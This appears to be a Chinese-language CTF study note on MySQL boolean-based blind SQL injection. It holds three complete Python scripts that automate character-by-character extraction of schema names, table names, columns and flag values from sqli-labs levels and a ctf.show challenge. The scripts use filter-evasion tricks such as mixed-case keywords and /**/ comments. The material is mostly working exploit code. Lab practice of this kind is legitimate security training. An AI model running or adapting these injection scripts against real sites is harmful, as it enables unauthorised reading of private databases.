mysql基于布尔的盲注,使用python脚本爆破
使用python脚本,判断返回页面中是否包含成功的flag图片,爆破出来数据库中的内容,实现自动爆破
判断返回结果中是否存在图片路径
import requests import time url = "http://127.0.0.1/sqli-labs-master/Less-14/" payload = { "uname" : "", "passwd" : "123456", "submit" : "Submit" } result = "" for i in range(1,100): l = 33 r =130 mid = (l+r)>>1 while(l<r): # 跑库名 payload["uname"] ="-1\" or 0^" + "(ascii(substr((SeleCt/**/grOUp_conCAt(schema_name)/**/fROm/**/information_schema.schemata),{0},1))>{1})-- ".format(i, mid) # 跑表名 #"-1\" or 0^" + "(ascii(substr((SeleCt/**/grOUp_conCAt(table_name)/**/fROm/**/information_schema.tables/**/wHERe/**/table_schema/**/like/**/'ctfshow'),{0},1))>{1})-- ".format(i, mid) # 跑列名 #"-1\" or 0^" + "(ascii(substr((Select/**/groUp_coNcat(column_name)frOm/**/information_schema.columns/**/Where/**/table_name/**/like/**/'flagb'),{0},1))>{1})-- ".format(i,mid) ####################### #"-1\" or 0^" + "(ascii(substr((select(flag4s)from(ctfshow.flagb)),{0},1))>{1})-- ".format(i, mid) #payload["uname"] ="-1\" or 0^" + "(ascii(substr((select(flag4s)from(ctfshow.flagb)),{0},1))>{1})-- ".format(i, mid) html = requests.post(url,data=payload) print(payload) if "/images/flag.jpg" in html.text: l = mid+1 else: r = mid mid = (l+r)>>1 if(chr(mid)==" "): break result = result + chr(mid) print(result) print("flag: " ,result)
判断返回结果中,是否有特定字符串
import requests url = "http://47b9f914-0fd8-44fc-964f-d44867657b75.challenge.ctf.show/" result = '' i = 0 while True: i = i + 1 head = 32 tail = 127 while head < tail: mid = (head + tail) >> 1 # payload = f'if(ascii(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema="ctfshow")),{i},1))>{mid},1,0)' # payload = f'if(ascii(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema="ctfshow")),{i},1))>{mid},1,0)%23' payload = f'if(ascii(substr((select(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0)%23' data = { 'id': f"100')||{payload}||('0" } r = requests.get(url,params=data) if "Dumb" in r.text: head = mid + 1 else: tail = mid if head != 32: result += chr(head) else: break print(result)
通过sql-lab的44关,使用基于返回结果中是否有图片,且加了字符串绕过的方式
注重burp的返回结果中,存在重定向登录,而浏览器会执行重定向访问结果,而burp不会自动执行重定向结果,所以可以使用burp的返回结果中来判断
此脚本使用了特殊字符过滤,绕过的方法
#author:yu22x improve by jay17 import requests import string import base64 url="http://172.18.38.125:1470/Less-44/login.php" s=string.ascii_letters+string.digits flag='' for i in range(1,999): print(i) for j in range(32,128): # 跑库名 s = f"999'/**/or/**/if(ascii(substr((SeleCt/**/grOUp_conCAt(schema_name)/**/fROm/**/information_schema.schemata),{i},1))/**/like/**/{j},1,0)#" # 跑表名 #s = f"999'/**/or/**/if(ascii(substr((SeleCt/**/grOUp_conCAt(table_name)/**/fROm/**/information_schema.tables/**/wHERe/**/table_schema/**/like/**/'ctf'),{i},1))/**/like/**/{j},1,0)#" # 跑列名 #s = f"999'/**/or/**/if(ascii(substr((Select/**/groUp_coNcat(column_name)frOm/**/information_schema.columns/**/Where/**/table_name/**/like/**/'f111'),{i},1))/**/like/**/{j},1,0)#" ####################### #s = f"999'/**/or/**/if(ord(substr((Select/**/grOUp_cOncat(flag)/**/frOm/**/flag),{i},1))/**/like/**/{j},1,0)#" #sre = s[::-1] #逆序 #sbase=str(base64.b64encode(sre.encode("utf-8")), "utf-8") #base64 #data={ # 'id':s, #} data={ "login_user":"1\'--+", "login_password":s, "mysubmit":"Login" } r=requests.post(url,data=data) #print(r.text) if "/images/slap1.jpg" not in r.text: #注意这里是【not in】 flag+=chr(j) print(flag) break
